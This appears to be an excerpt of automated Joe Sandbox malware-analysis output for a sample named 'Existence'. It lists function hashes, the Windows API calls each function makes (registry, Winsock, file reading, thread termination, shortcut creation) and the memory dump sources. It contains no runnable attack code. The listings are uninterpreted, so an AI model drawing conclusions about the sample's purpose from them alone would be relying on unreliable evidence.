                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                          • String ID: j`y
                                                                                                                                                                                          • API String ID: 2931989736-4129633755
                                                                                                                                                                                          • Opcode ID: b13d2c033e35a378b1647b869ee5119291a67720934bda8b28af53fef37184c7
                                                                                                                                                                                          • Instruction ID: cad9937c1cb29745cb07f8fbc70a86aa094fe1dda97e0affc529c1bd5708c24f
                                                                                                                                                                                          • Opcode Fuzzy Hash: b13d2c033e35a378b1647b869ee5119291a67720934bda8b28af53fef37184c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701B5E1604309BB9A1056286CC2FEB736D9F5439AF004522FD099A341F76DED14C6F1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0079E328
                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0079E32F
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0079E345
                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0079E34C
                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0079E390
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0079E36D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                                                                                                          • Opcode ID: 4abb7d0c7c761c255029fdee0467dfd689a250843519f059aee680d1ebac339f
                                                                                                                                                                                          • Instruction ID: 11abaad433febe5a56b2c695281db3901258ddf027ebf2d9e9b616e64f5f403a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4abb7d0c7c761c255029fdee0467dfd689a250843519f059aee680d1ebac339f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 500186F290020CBFE72197A4DD89EF7776CD708344F0185B5B705E6041E6789E848B79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 007A1322
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 007A1334
                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 007A1342
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007A1350
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007A135F
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 007A136F
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 007A1376
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                                          • Opcode ID: 603f890deea22856a45b0486a3f83c2957f2265bcc610553cf8357ae3120ca76
                                                                                                                                                                                          • Instruction ID: d956dc3c8a4e3339128f48b98058fa3565e263add5e8c3a559b3d9b95b114dce
                                                                                                                                                                                          • Opcode Fuzzy Hash: 603f890deea22856a45b0486a3f83c2957f2265bcc610553cf8357ae3120ca76
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0EC32042A12FBD7615F94EE49FD6BB39FF45302F805135F102918A087789872CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007B281D
                                                                                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007B283E
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B284F
                                                                                                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 007B2938
                                                                                                                                                                                          • inet_ntoa.WSOCK32(?), ref: 007B28E9
                                                                                                                                                                                            • Part of subcall function 0079433E: _strlen.LIBCMT ref: 00794348
                                                                                                                                                                                            • Part of subcall function 007B3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,007AF669), ref: 007B3C9D
                                                                                                                                                                                          • _strlen.LIBCMT ref: 007B2992
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3203458085-0
                                                                                                                                                                                          • Opcode ID: 97be81d3d17c1cfa1c69c09d69338cf249d6e730d921eff3f91f3c7af5b7e557
                                                                                                                                                                                          • Instruction ID: e1598cb8b903165b84011f41754802fd8466b5fc4a5320851c3b22f41a8e2526
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be81d3d17c1cfa1c69c09d69338cf249d6e730d921eff3f91f3c7af5b7e557
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB1DF71604300EFD324DF24C889F6ABBA5AF84318F54894CF55A5B2A3DB39ED46CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __allrem.LIBCMT ref: 0076042A
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00760446
                                                                                                                                                                                          • __allrem.LIBCMT ref: 0076045D
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0076047B
                                                                                                                                                                                          • __allrem.LIBCMT ref: 00760492
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007604B0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                                          • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                          • Instruction ID: c419cde5080cb153381dea3ac8464596edc8a838cf0cc8f7c3586f9c13a036b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82811671A00706DBE721AE69CC85B6B77A9EF45320F24412EF917D7282EB78D90187D0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00758649,00758649,?,?,?,007667C2,00000001,00000001,8BE85006), ref: 007665CB
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007667C2,00000001,00000001,8BE85006,?,?,?), ref: 00766651
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0076674B
                                                                                                                                                                                          • __freea.LIBCMT ref: 00766758
                                                                                                                                                                                            • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
                                                                                                                                                                                          • __freea.LIBCMT ref: 00766761
                                                                                                                                                                                          • __freea.LIBCMT ref: 00766786
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                                          • Opcode ID: 089ca39a42c52bf57cf870aa17dc0487b0687062eb1a9f9425b52ef577e4fadd
                                                                                                                                                                                          • Instruction ID: 327638a668bc29a1cf44df9a36f5132f09752b892c14f7bfc9f3bb3a6e2ef8af
                                                                                                                                                                                          • Opcode Fuzzy Hash: 089ca39a42c52bf57cf870aa17dc0487b0687062eb1a9f9425b52ef577e4fadd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 145106B260020AAFDB258F64CC85EBF77AAEB40754F554669FC1AD7144EB3CEC50C6A0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC72A
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007BC785
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007BC7CA
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007BC7F9
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007BC853
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 007BC85F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1120388591-0
                                                                                                                                                                                          • Opcode ID: 36e2597060dc8837a3fd21c654a8140ff75f760052bc43ac65c9733c82e523de
                                                                                                                                                                                          • Instruction ID: aacfc5c1ad0348e792cfb0b756c479e28cecb4c8c2c36ca6e424ef94e273ce82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 36e2597060dc8837a3fd21c654a8140ff75f760052bc43ac65c9733c82e523de
                                                                                                                                                                                          • Instruction Fuzzy Hash: 56818A70208241EFD715DF24C885F6ABBE5BF84308F0484ACF4598B2A2DB39ED45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantInit.OLEAUT32(00000035), ref: 007900A9
                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00790150
                                                                                                                                                                                          • VariantCopy.OLEAUT32(00790354,00000000), ref: 00790179
                                                                                                                                                                                          • VariantClear.OLEAUT32(00790354), ref: 0079019D
                                                                                                                                                                                          • VariantCopy.OLEAUT32(00790354,00000000), ref: 007901A1
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007901AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3859894641-0
                                                                                                                                                                                          • Opcode ID: fa91bd7774c9eaaba0bd54ca1c792bfe0f888696f8bcebb55c580a2bd0239ac6
                                                                                                                                                                                          • Instruction ID: 0887ab60b833177fdcb5a5aacec887e337d671586c881a5e70d9d2bf2105267f
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa91bd7774c9eaaba0bd54ca1c792bfe0f888696f8bcebb55c580a2bd0239ac6
                                                                                                                                                                                          • Instruction Fuzzy Hash: F651D831660310EEDF24AB64A88DB29B3A5FF45310F249447F906DF296DB789C44CBD6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 007A9F2A
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A9F4B
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A9F72
                                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 007A9FCA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                          • API String ID: 83654149-3081909835
                                                                                                                                                                                          • Opcode ID: 660ab5b81415306b14f9880ae0f86de500d312c10fa7e9470314998f2b475f7b
                                                                                                                                                                                          • Instruction ID: 8bfa5b2cc1a5ce64070799eb50129fd336d77611035cefd96557304a01d596e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 660ab5b81415306b14f9880ae0f86de500d312c10fa7e9470314998f2b475f7b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52E1B371604340DFD724EF24C885B6AB7E0BF85314F04896CF9899B2A2DB79ED45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A6F21
                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 007A707E
                                                                                                                                                                                          • CoCreateInstance.OLE32(007D0CC4,00000000,00000001,007D0B34,?), ref: 007A7095
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 007A7319
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                          • API String ID: 886957087-24824748
                                                                                                                                                                                          • Opcode ID: 1e217c89b19e8f2e6bb7076d01a0acadb0f6875ae3e58d0d11334981c7fab44c
                                                                                                                                                                                          • Instruction ID: 6ac6c27dfccd2ced96d1b214be849f17cb1d1f7921ab93aac62f8abfd7bff36c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e217c89b19e8f2e6bb7076d01a0acadb0f6875ae3e58d0d11334981c7fab44c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AD13771608301EFD304EF24C885A6BB7E8FF99704F40896DF5858B2A2DB75E945CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 00731B35
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00731B99
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00731BB6
                                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00731BC7
                                                                                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00731C15
                                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00773287
                                                                                                                                                                                            • Part of subcall function 00731C2D: BeginPath.GDI32(00000000), ref: 00731C4B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3050599898-0
                                                                                                                                                                                          • Opcode ID: 66efc8f5320e49525d3520f608fd2f68e18949081396285658e7134c06530f1b
                                                                                                                                                                                          • Instruction ID: 6642f5b5b07b2ea9d50488f472712e1b5ad8c1df0663484d04144b48014c76dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66efc8f5320e49525d3520f608fd2f68e18949081396285658e7134c06530f1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F41D270105300AFEB20DF24DC88FB67BA8FB45364F144669FA98862A2C7799D45DB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 007A11B3
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 007A11EE
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 007A120A
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 007A1283
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007A129A
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 007A12C8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                                          • Opcode ID: 50c396ad3f0188ff502f0759c224b70e138202d4c14b138bc493ad06cb6659c1
                                                                                                                                                                                          • Instruction ID: 92554566f9b14b077abfe2bcc93de32d5d5e67d7731740d4fa2c8a6a55054e9f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 50c396ad3f0188ff502f0759c224b70e138202d4c14b138bc493ad06cb6659c1
                                                                                                                                                                                          • Instruction Fuzzy Hash: C641A031A00208EFEF049F54DC89AAAB7B8FF44310F1480A9FD009B296D778DE55CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0078FBEF,00000000,?,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 007C8CA7
                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 007C8CCD
                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007C8D2C
                                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 007C8D40
                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 007C8D66
                                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 007C8D8A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
